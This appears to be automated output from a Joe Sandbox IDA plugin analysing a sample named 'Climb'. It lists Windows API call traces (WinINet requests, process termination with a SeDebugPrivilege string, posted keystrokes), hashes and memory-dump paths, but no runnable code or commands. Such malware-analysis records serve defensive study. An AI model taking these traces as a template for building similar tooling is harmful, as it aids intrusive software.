                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                          • Opcode ID: 32eafa55152e4c6d29957b24b69475707e721aab35524bef481f1d32f8d8f90f
                                                                                                                                                                          • Instruction ID: de0fc7f6cd60748aa809ff1513e69cfb1c300805054678c8f604da2f1a178265
                                                                                                                                                                          • Opcode Fuzzy Hash: 32eafa55152e4c6d29957b24b69475707e721aab35524bef481f1d32f8d8f90f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4F518C74604304AFDB04EF24DC96FAA77E4FB88714F400A2DF996972E2DB709A44CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0012CCB7
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0012CCDF
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0012CD0F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0012CD67
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0012CD7B
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0012CD86
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                          • Opcode ID: 00bc72b622df8cd90bcf9227809838716609fdd3d75640f67f73d0ead2f2eb6b
                                                                                                                                                                          • Instruction ID: fbb010da7d8b868948926d3c28794e4063de3358edd9de86a9e7cf82f637cfc8
                                                                                                                                                                          • Opcode Fuzzy Hash: 00bc72b622df8cd90bcf9227809838716609fdd3d75640f67f73d0ead2f2eb6b
                                                                                                                                                                          • Instruction Fuzzy Hash: D631ABB5600618AFDB21AFA4FC88AAF7BFCEB45744B10452AF54693210DB30E9549BE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000F55AE,?,?,Bad directive syntax error,0014DCD0,00000000,00000010,?,?), ref: 0011A236
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,000F55AE,?), ref: 0011A23D
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0011A301
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                          • Opcode ID: e2964ebb6d930b7700a1e2ba09f8b8d9078214a98f5a213510572006323d5520
                                                                                                                                                                          • Instruction ID: 8a506a7effcfcc0dfcb295d60bfa2b7ca0912a475f40da2719ef70492d8f41b8
                                                                                                                                                                          • Opcode Fuzzy Hash: e2964ebb6d930b7700a1e2ba09f8b8d9078214a98f5a213510572006323d5520
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D215E3290021EEFCF15ABA0CC0AEFE7B79BF18700F444469B515660A3EB769A58DB11
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32 ref: 001129F8
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00112A0D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00112A9A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                          • Opcode ID: f564a79d06b12cf7435996472161d33fcc035fc2281ba010ace12d899959e473
                                                                                                                                                                          • Instruction ID: 43768c6117e0d0f51f081156d28639e428e5349f35b0277a482a5fb25b5e93a7
                                                                                                                                                                          • Opcode Fuzzy Hash: f564a79d06b12cf7435996472161d33fcc035fc2281ba010ace12d899959e473
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11E97A388707BAFA2C6620FC07DE637ADDF16724B214032F909E74D2FB7568A14914
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000B758D
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000B75CE
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 000B75F6
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 000B773A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 000B775B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                          • Opcode ID: 74cfeea82e52cb905cdb71b10d773357f5dfdf1ba1679a59db6cbffb0c35be25
                                                                                                                                                                          • Instruction ID: b41e246826d173c88b1f380923a1c342705ae0266791e1d6874a289846aacb39
                                                                                                                                                                          • Opcode Fuzzy Hash: 74cfeea82e52cb905cdb71b10d773357f5dfdf1ba1679a59db6cbffb0c35be25
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC15A3990464AEFDF20CFA8C540BEDB7F1FF58310F14841AE899A7650DB35A951EB60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                          • Opcode ID: 8bad6e91754f1fc43b7d8003517a9cb82d1d02ebedf85ea0e9c5b50b26b27b2a
                                                                                                                                                                          • Instruction ID: 9cd02237401224cd1f7262056e2d4a57e9a9392a7162c46ab043679d5aee66c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8bad6e91754f1fc43b7d8003517a9cb82d1d02ebedf85ea0e9c5b50b26b27b2a
                                                                                                                                                                          • Instruction Fuzzy Hash: D3613972904385AFDB21AFB6DC857AE7BE8EF11320F04456FEA44B7283D631DA418751
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00145C24
                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00145C65
                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 00145C6B
                                                                                                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00145C6F
                                                                                                                                                                            • Part of subcall function 001479F2: DeleteObject.GDI32(00000000), ref: 00147A1E
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00145CAB
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00145CB8
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00145CEB
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00145D25
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00145D34
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3210457359-0
                                                                                                                                                                          • Opcode ID: 1416883c6b8fca5460d65ffaf644fe4c0dc2ddb2c01758197c2b0da5a9d27724
                                                                                                                                                                          • Instruction ID: f3820b3a7ea31af029da841de7b32db8695578244d6f512fb12716ec2c319c38
                                                                                                                                                                          • Opcode Fuzzy Hash: 1416883c6b8fca5460d65ffaf644fe4c0dc2ddb2c01758197c2b0da5a9d27724
                                                                                                                                                                          • Instruction Fuzzy Hash: 43519D35A40A09BFEF259F64CC89BD83BA7FF05754F148121FA249A1F2C776A980DB41
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000F28D1
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000F28EA
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000F28FA
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000F2912
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000F2933
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000B11F5,00000000,00000000,00000000,000000FF,00000000), ref: 000F2942
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000F295F
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000B11F5,00000000,00000000,00000000,000000FF,00000000), ref: 000F296E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1268354404-0
                                                                                                                                                                          • Opcode ID: e6108601409badf6b9973b03a269a2bec8484f19cc55e033d28ca9bd9b73c6fb
                                                                                                                                                                          • Instruction ID: e6c97427672cbc650027d0ebafd99c12980434bc98d25ca58c8a88eb79c1724a
                                                                                                                                                                          • Opcode Fuzzy Hash: e6108601409badf6b9973b03a269a2bec8484f19cc55e033d28ca9bd9b73c6fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B34A00209AFDB24CF25DC95BEA7BF5FF48764F104528FA4297AA0DB70E990DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012CBC7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0012CBDA
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0012CBEE
                                                                                                                                                                            • Part of subcall function 0012CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0012CCB7
                                                                                                                                                                            • Part of subcall function 0012CC98: GetLastError.KERNEL32 ref: 0012CD67
                                                                                                                                                                            • Part of subcall function 0012CC98: SetEvent.KERNEL32(?), ref: 0012CD7B
                                                                                                                                                                            • Part of subcall function 0012CC98: InternetCloseHandle.WININET(00000000), ref: 0012CD86
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                          • Opcode ID: 19a496021142b2dc25c804e26116790b7172a636604142e68e3b4cde052a0298
                                                                                                                                                                          • Instruction ID: b7c8e2d513610267fca0588c8792d09efad8ed4618e19e6a6f2ffef0bfaee69d
                                                                                                                                                                          • Opcode Fuzzy Hash: 19a496021142b2dc25c804e26116790b7172a636604142e68e3b4cde052a0298
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F318B75200715AFDB218FA1ED44A6BBBA8FF05314B10452DFA5A83A20C731E864ABA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
                                                                                                                                                                            • Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
                                                                                                                                                                            • Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F0A
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00112F28
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00112F2C
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F36
                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00112F4E
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00112F52
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00112F5C
                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00112F70
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00112F74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                          • Opcode ID: 15d14dd76f98134d2408b8bcd9fd40719fee77573ed26f93688dcd3618f5558b
                                                                                                                                                                          • Instruction ID: 12acfca20ab4d18933116a0a43191f1f21190642484bfc73c4dec3a37a9cdfb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 15d14dd76f98134d2408b8bcd9fd40719fee77573ed26f93688dcd3618f5558b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5801D8347942107BFB106768EC8AF993F59EB5EF11F110011F718AE1F0C9F154848AA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00111D95,?,?,00000000), ref: 00112159
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 00112160
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00111D95,?,?,00000000), ref: 00112175
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00111D95,?,?,00000000), ref: 0011217D
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 00112180
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00111D95,?,?,00000000), ref: 00112190
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00111D95,00000000,?,00111D95,?,?,00000000), ref: 00112198
                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00111D95,?,?,00000000), ref: 0011219B
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,001121C1,00000000,00000000,00000000), ref: 001121B5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                          • Opcode ID: b75852e853b316f3db85c509449e98cbe42054165501be6dc0852268e4928cd2
                                                                                                                                                                          • Instruction ID: df746398f3f483003bbca3da75ab41865083eff4079890099c87a174ad4eee2b
                                                                                                                                                                          • Opcode Fuzzy Hash: b75852e853b316f3db85c509449e98cbe42054165501be6dc0852268e4928cd2
                                                                                                                                                                          • Instruction Fuzzy Hash: E601BBB9240304BFEB10AFA5EC4DF6B7BACEB89B11F414411FE05DB5A1CA709850CB20
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0011DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0011DDAC
                                                                                                                                                                            • Part of subcall function 0011DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0011DDBA
                                                                                                                                                                            • Part of subcall function 0011DD87: CloseHandle.KERNEL32(00000000), ref: 0011DE87
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013ABCA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0013ABDD
                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0013AC10
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0013ACC5
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0013ACD0
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0013AD21
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                                          • Opcode ID: 3bf86bfef0bd2d2bf75e1661112b93b0ab601ec723add7168a97647b4fa56ee9
                                                                                                                                                                          • Instruction ID: 555c6aeee39da613427dfc408b700de9c537c127ab8fb83baf99d4dd118e80ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf86bfef0bd2d2bf75e1661112b93b0ab601ec723add7168a97647b4fa56ee9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4961B074204241AFD724DF14C495FA5BBE1AF54318F58849CE4A64BBA3C771EC85CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001443C1
                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001443D6
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001443F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00144435
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00144462
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00144490
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                          • Opcode ID: d6ca43eb439ce5b9f0f34a5645172abde27171527a55e6fa63b6ccb744ebc6c9
                                                                                                                                                                          • Instruction ID: 6bdbb127437c1ed2847aced9759ac4b9c7c59932839456befa4dd622595059a8
                                                                                                                                                                          • Opcode Fuzzy Hash: d6ca43eb439ce5b9f0f34a5645172abde27171527a55e6fa63b6ccb744ebc6c9
                                                                                                                                                                          • Instruction Fuzzy Hash: B941AD71A00319ABDF21DF64CC49BEA7BA9FF48760F14012AF958E72A1D7759D80CB90
                                                                                                                                                                          APIs
